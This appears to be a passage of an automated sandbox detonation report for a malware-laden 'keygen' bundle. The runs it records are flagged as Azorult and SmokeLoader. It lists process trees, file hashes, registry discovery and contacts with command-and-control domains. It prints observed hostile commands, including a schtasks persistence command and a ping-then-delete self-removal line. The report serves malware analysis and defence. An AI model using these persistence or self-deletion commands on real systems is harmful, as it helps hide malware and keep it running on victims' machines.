PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 cleaner-partners.biz udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp

Files

memory/1552-0-0x000000007490E000-0x000000007490F000-memory.dmp

memory/1552-1-0x0000000000230000-0x0000000000406000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/2972-26-0x0000000000200000-0x0000000000208000-memory.dmp

memory/2812-25-0x0000000001300000-0x0000000001320000-memory.dmp

memory/2816-24-0x000000013FE70000-0x000000013FE80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/2812-39-0x0000000000140000-0x000000000015A000-memory.dmp

memory/2868-40-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/2816-43-0x0000000000560000-0x000000000056E000-memory.dmp

memory/876-50-0x000000013F550000-0x000000013F560000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1980-61-0x000000013FA30000-0x000000013FA36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabFCF7.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarFD38.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Network

Country Destination Domain Proto
SG 37.0.10.214:80 tcp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2492 -ip 2492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 352

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/2492-1-0x0000000002E10000-0x0000000002F10000-memory.dmp

memory/2492-2-0x0000000002CA0000-0x0000000002CA9000-memory.dmp

memory/2492-3-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2492-5-0x0000000002CA0000-0x0000000002CA9000-memory.dmp

memory/2492-6-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2492-4-0x0000000000400000-0x0000000002B4E000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp
US 8.8.8.8:53 229.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 104.208.16.88:443 tcp

Files

memory/2544-0-0x00007FFBB8963000-0x00007FFBB8965000-memory.dmp

memory/2544-1-0x0000000000800000-0x000000000081E000-memory.dmp

memory/2544-2-0x00000000010E0000-0x00000000010FA000-memory.dmp

memory/2544-3-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp

memory/2544-5-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240708-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.210:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp

Files

memory/2352-0-0x00000000000F0000-0x0000000000108000-memory.dmp

memory/3052-5-0x0000000000440000-0x0000000000525000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/2084-17-0x0000000000190000-0x0000000000275000-memory.dmp

memory/3048-37-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

138s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3712 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3712 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3712 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3712 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3712 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3712 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3712 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3712 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3712 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 4728 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 4728 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 4728 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 464 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
